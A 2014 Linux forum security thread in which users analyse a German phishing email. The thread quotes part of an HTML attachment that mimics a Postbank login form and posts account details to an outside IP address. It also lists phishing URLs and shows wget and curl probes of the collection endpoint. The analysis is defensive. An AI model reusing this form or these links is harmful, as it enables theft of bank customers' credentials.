Puppy Linux Discussion Forum Forum Index Puppy Linux Discussion Forum
Puppy HOME page : puppylinux.com
"THE" alternative forum : puppylinux.info
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

The time now is Fri 19 Dec 2014, 09:56
All times are UTC - 4
 Forum index » Off-Topic Area » Security
First Bank Account html form bamboozlement
Post new topic   Reply to topic View previous topic :: View next topic
Page 1 of 1 [5 Posts]  
Author Message
Karl Godt


Joined: 20 Jun 2010
Posts: 3982
Location: Kiel,Germany

PostPosted: Thu 30 Jan 2014, 11:56    Post subject:  First Bank Account html form bamboozlement  

Today I firstly managed to isolate a fraud.html attachment,
that Firefox addon Simple Mail fetched from my remote inbox .

It is written in an almost worst German.

I get such fraud mails approx. once a week with only one or two spelling or grammar errors
with an already dead link to somewhere
http://coomar.milchs.org/KhaaPjMSgcRLYz4Qz63Z7qotpfn0/UBlVGqP8IWFAc.html

and here is a (still valid) one :
http://babilon.arptoday.org/wWMrsTng/ymhidq40eBbLaTqPUjx3cpRlqvW92s2poVk.html


But this one has an tan.html attachment with following lines :
[ .. ]
Code:
<div id="main"><div id="main-cn"><div id="nav"><div id="nav-cn">
<a href="#content" class="skip">Navigation berspringen</a>
<div id="nav-global" class="nav">
<h2 class="aux">Navigation</h2>
<ul><li class="ng-account-overview">
<a href="?wicket:bookmarkablePage=:de.postbank.ucp.application.rai.fs.kontenuebersicht.FinanzstatusPage" class="state-current">Kontenbersicht</a></li></ul></div></div></div>
    <form action="http://163.17.12.7/postdone.php" method="post" name="form" id="form">
      <div id="content">
        <div id="content-cn">
          <div id="div9">
            <div id="div" class="tpl-05">
              <div id="div2">
                <div id="div3">
                  <div id="div4">
                    <div id="div5">
                      <div id="div6">
                        <div id="content-bd">
                          <div class="tab-panel-bd">
                            <div id="id3d7">
                              <div class="form frm-western-union">
                                <div>
                                  <div class="frm-freigeben control-step" id="id45a">
                                    <div id="id460">
                                      <div class="form-ft ft-legitimacy">
                                        <fieldset>
                                          <div class="legend"><h3>Postbank Online-Banking - Willkommen</h3></div>
                                          <div class="legitimacy">
                                          <div class="legitimacy-cn">
                                            <div class="legitimacy-hd"></div>
                                            <div id="id464">
                                              <div class="inputBlock">
                                                <div id="id46d">

                                                  <div class="legitimacy-bd" id="id478">
                                                    <p><strong>Bitte lesen Sie sorgfältig und füllen Sie alle Schritte in Form aufgeführt, so können wir erfolgreich überprüfen Sie Ihr Profil.</strong></p>
                                                    <div class="field fld-text fld-mobile-tan" id="id479">
                                                      <div class="field-cn" id="id492">
                                                        <div class="field-bd"> <span class="field-group"> <span class="field-label">
                                                          <label for="mobile-tan"> <b>Kontonummer:</b> </label>
                                                          </span></span></div>

[ .. ]
                                    <wicket:container id="id46e" style="display:none"></wicket:container>
                                  </div>
                                </div>
                              </div></div></div></div></div></div></div></div></div></div></div></div></div></form>


wget http://163.17.12.7/postdone.php gave me these outputs :

Code:
bash-3.00# wget http://163.17.12.7/postdone.php
--16:41:26--  http://163.17.12.7/postdone.php
           => `postdone.php'
Connecting to 163.17.12.7:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: https://postbank.de [following]
--16:41:28--  https://postbank.de/
           => `index.html'
Resolving postbank.de... 160.83.4.4
Connecting to postbank.de|160.83.4.4|:443... connected.
ERROR: Certificate verification error for postbank.de: unable to get local issuer certificate
To connect to postbank.de insecurely, use `--no-check-certificate'.
Unable to establish SSL connection.
bash-3.00# wget --no-check-certificate http://163.17.12.7/postdone.php
--16:41:50--  http://163.17.12.7/postdone.php
           => `postdone.php'
Connecting to 163.17.12.7:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: https://postbank.de [following]
--16:41:51--  https://postbank.de/
           => `index.html'
Resolving postbank.de... 160.83.4.4
Connecting to postbank.de|160.83.4.4|:443... connected.
WARNING: Certificate verification error for postbank.de: unable to get local issuer certificate
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://www.postbank.de/ [following]
--16:41:53--  https://www.postbank.de/
           => `index.html'
Resolving www.postbank.de... 160.83.4.4
Connecting to www.postbank.de|160.83.4.4|:443... connected.
WARNING: Certificate verification error for www.postbank.de: unable to get local issuer certificate
WARNING: certificate common name `postbank.de' doesn't match requested host name `www.postbank.de'.
HTTP request sent, awaiting response... 200 OK
Length: 103,127 (101K) [text/html]

100%[====================================>] 103,127      170.98K/s             

16:41:54 (170.60 KB/s) - `index.html' saved [103127/103127]

bash-3.00#
Back to top
View user's profile Send private message Visit poster's website 
L18L

Joined: 19 Jun 2010
Posts: 2610
Location: www.eussenheim.de/

PostPosted: Thu 30 Jan 2014, 14:51    Post subject: Re: First Bank Account html form bamboozlement  

wget http://163.17.12.7/postdone.php gave me these outputs
Code:
# wget http://163.17.12.7/postdone.php
--2014-01-30 20:02:52--  http://163.17.12.7/postdone.php
Connecting to 163.17.12.7:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://postbank.de [following]
--2014-01-30 20:02:53--  https://postbank.de/
Resolving postbank.de (postbank.de)... 160.83.4.4
Connecting to postbank.de (postbank.de)|160.83.4.4|:443... connected.
ERROR: cannot verify postbank.de's certificate, issued by `/C=US/O=VeriSign, Inc./OU=VeriSign Trust Network/OU=Terms of use at https://www.verisign.com/rpa (c)06/CN=VeriSign Class 3 Extended Validation SSL SGC CA':
  Unable to locally verify the issuer's authority.
To connect to postbank.de insecurely, use `--no-check-certificate'.
#

different maybe because this was from Fatdog?


EDIT: wget version 1.13

Last edited by L18L on Fri 31 Jan 2014, 05:36; edited 1 time in total
Back to top
View user's profile Send private message 
Karl Godt


Joined: 20 Jun 2010
Posts: 3982
Location: Kiel,Germany

PostPosted: Thu 30 Jan 2014, 17:19    Post subject:  

bash-3.00# wget --version
GNU Wget 1.10.2
Don't think that it matters . Have had YouTube session that reached my 5GB full speed limit, now am throttled ..


bash-3.00# host http://163.17.12.7
Host http://163.17.12.7 not found: 3(NXDOMAIN)

bash-3.00# host 163.17.12.7
7.12.17.163.in-addr.arpa domain name pointer E-7.iem.cyut.edu.tw.

And googling for E-7.iem.cyut.edu.tw :

Browse ftp://E-7.iem.cyut.edu.tw - FileMare.com
filemare.com/browse/E-7.iem.cyut.edu.tw‎Diese Seite übersetzen
Browse ftp://E-7.iem.cyut.edu.tw: PORT1. ... ftp://E-7.iem.cyut.edu.tw. also known as ftp://163.17.12.7. » Asia » Taiwan » T'ai-pei » Taipei. affiliate marketing.


And
bash-3.00# wget ftp://163.17.12.7/postdone.php
--22:09:17-- ftp://163.17.12.7/postdone.php
=> `postdone.php'
Connecting to 163.17.12.7:21... failed: Connection timed out.
Retrying.

...

http://www.hcidata.info/host2ip.cgi
also says
Quote:
Details of 163.17.12.7
IP Address : 163.17.12.7
Location : Taiwan (95% accuracy)
Host Name : E-7.iem.cyut.edu.tw


What the hell is there in Tai-Wan ?


And wget now also further directs to

Code:
bash-3.00# wget http://163.17.12.7/postdone.php
--22:15:28--  http://163.17.12.7/postdone.php
           => `postdone.php'
Connecting to 163.17.12.7:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: https://postbank.de [following]
--22:15:31--  https://postbank.de/
           => `index.html.1'
Resolving postbank.de... 160.83.4.4
Connecting to postbank.de|160.83.4.4|:443... connected.
ERROR: Certificate verification error for postbank.de: unable to get local issuer certificate
To connect to postbank.de insecurely, use `--no-check-certificate'.
Unable to establish SSL connection.


AND curl seems somehow at least download something :
Code:
bash-3.00# curl --post301 --post302 http://163.17.12.7/postdone.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>302 Found</TITLE> </HEAD><BODY><H1>Found</H1>The document has moved <A HREF="https://postbank.de">here</A>.<P><HR><ADDRESS>Apache/1.3.23 Server at localhost Port 80</ADDRESS></BODY></HTML>bash-3.00#

_________________
«Give me GUI or Death» -- I give you [[Xx]term[inal]] [[Cc]on[s][ole]] .
Macpup user since 2010 on full installations.
People who want problems with Puppy boot frugal Razz
Back to top
View user's profile Send private message Visit poster's website 
L18L

Joined: 19 Jun 2010
Posts: 2610
Location: www.eussenheim.de/

PostPosted: Fri 31 Jan 2014, 05:20    Post subject:  

Karl Godt wrote:
bash-3.00# wget --version
GNU Wget 1.10.2
Don't think that it matters

You are right. I had overseen that you have posted 2 commands (without and with --no-check-certificate)

The connection goes to Deutsche Bank's postbank via edu.tw.
....and edu.tw has one of your tans (if your knowledge of German language was as bad as the language used in that mail ) Razz

You could ask Deutsche Bank to not accept redirects from tw. Rolling Eyes
Back to top
View user's profile Send private message 
Karl Godt


Joined: 20 Jun 2010
Posts: 3982
Location: Kiel,Germany

PostPosted: Fri 31 Jan 2014, 08:54    Post subject:  

L18L wrote:
Karl Godt wrote:
bash-3.00# wget --version
GNU Wget 1.10.2
Don't think that it matters

You are right. I had overseen that you have posted 2 commands (without and with --no-check-certificate)

The connection goes to Deutsche Bank's postbank via edu.tw.
....and edu.tw has one of your tans (if your knowledge of German language was as bad as the language used in that mail ) Razz

You could ask Deutsche Bank to not accept redirects from tw. Rolling Eyes


I have send an mail about that to missbrauch @ post bank de and got a standard response, that their folks would investigate .

Deutsche Bank is a private commercial bank, that has nothing to do with german federal reserve Deutsche Bundesbank - just same as the danish Den Danske Bank .

Post Bank is the bank branch of the formerly state-owned German Mail.
Back to top
View user's profile Send private message Visit poster's website 
Display posts from previous:   Sort by:   
Page 1 of 1 [5 Posts]  
Post new topic   Reply to topic View previous topic :: View next topic
 Forum index » Off-Topic Area » Security
Jump to:  

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Powered by phpBB © 2001, 2005 phpBB Group
[ Time: 0.1266s ][ Queries: 11 (0.0290s) ][ GZIP on ]